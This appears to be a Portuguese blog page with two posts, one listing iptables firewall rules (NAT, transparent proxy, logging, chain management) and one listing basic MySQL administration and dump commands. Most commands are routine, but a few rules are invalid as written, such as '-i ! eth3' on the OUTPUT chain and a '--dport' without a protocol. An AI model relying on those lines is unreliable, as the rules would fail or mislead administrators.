# iptables -A FORWARD -s 200.200.100.44 -d 192.168.0.0/24 -j REJECT
Redireciona os pacotes com destino a porta 3389 do protocolo tcp para o ip 10.0.0.5
# iptables -t nat -A PREROUTING -p tcp --dport 3389 -j DNAT --to 10.0.0.5:3389
Aceita a saida de pacotes de todas as interfaces exceto da eth3.
# iptables -A OUTPUT -i ! eth3 -j ACCEPT
Deleta a regra inserida anteriormente
# iptables -D OUTPUT -i ! eth3 -j ACCEPT
Aceita pacotes tcp com porta origem entre a 1024 até a 65535 com destino ao ip 10.0.10.5 na porta 80.
# iptables -A FORWARD -p tcp --sport 1024:65535 -d 10.0.10.5 --dport 80 -j ACCEPT
Configura o proxy transparente caso o proxy esteja rodando no mesmo host do firewall, a regra redireciona todo pacote com destino a porta 80 para a porta 3128.
# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 3128
Apaga todas as regras na chain INPUT
# iptables -F INPUT
Insere a regra no topo da lista, bloqueia o pacote que sair pela interface eth0 com destino a porta 3777.
# iptables -I OUTPUT -o eth0 --dport 3777 -j DROP
Cria a chain INTERNET na tabela filter
# iptables -t filter -N INTERNET
Renomeia a chain INTERNET para NET
# iptables -E INTERNET NET
Apaga a chain NET
# iptables -X NET
Loga acessos na porta 22
# iptables -A INPUT -p tcp --dport 22 -j LOG --log-prefix "ACESSO A PORTA 22"
Define espera minima para pacotes que entrarem no host com porta origem 22
# iptables -t mangle -A PREROUTING -p tcp --sport 22 -j TOS --set-tos 16
Fonte: Abrir
Read More

Comandos básicos MYSQL

Olá criaturas virtuais, Nessa post ire mostra alguns comando básicos do  MYSQL

Acessando banco como root
root@kali:~# mysql -h localhost -u root 
Inserindo uma senha
mysql> set password for root@localhost = password('abc12345');
Criando um banco
mysql> create DATABASE extras;
Usando o Banco
mysql> use extras;
Criando uma Tabela
mysql> create TABLE users (
    -> id int(11) NOT NULL AUTO_INCREMENT,
    -> name varchar(100) NOT NULL,
    -> address varchar(100) NOT NULL,
    -> phone varchar(50) NOT NULL,
    -> login varchar(100) NOT NULL,
    -> passwd varchar(100) NOT NULL,
    -> PRIMARY KEY (id)
    -> );
Mostrar Tabelas
mysql> show tables;
Mostrar Colunas de uma determinada Tabela
mysql> DESC users;
Inserir uma coluna em uma tabela
mysql> ALTER TABLE users ADD ip varchar(25);
Modificar definições de uma coluna
mysql> ALTER TABLE users MODIFY ip varchar(50);
Excluir coluna da tabela
mysql> ALTER TABLE users DROP phone;
Renomear uma tabela
mysql> ALTER TABLE users RENAME usuarios;
Deleta uma tabela
mysql> DROP TABLE noticias;
Inserir dados na tabela

mysql> INSERT INTO `usuarios` (`id`, `name`, `address`, `login`, `passwd`, `ip`) VALUES ('1', 'Marcos da Silva', 'Rua da sexta', 'markim123', 'admin1234', '192.168.1.1');
Update de uma determinada coluna
mysql> UPDATE `extras`.`usuarios` SET `passwd`='addmim123456' WHERE `usuarios`.`ID`=1;
Deleta uma base de bados
mysql> DROP DATABASE test;

Comandos Extras
Logando no servidor Remoto
root@kali:~# mysql --host mysql.url.com.br --user val--password='v234'
Dump de uma tabela salvando .sql
root@kali:~# mysqldump -h mysql.url.com.br -u USER -pSENHA --opt DATABSENAME TABLENAME > ~/desktop/backup.sql
Dump de uma tabela salvando .csv
root@kali:~# mysql -h mysql.url.com.br -u username -ppassword -e "SELECT * from TABLENAME" DATBASENAME | sed 's/\t/","/g;s/^/"/;s/$/"/' > filename.csv









Read More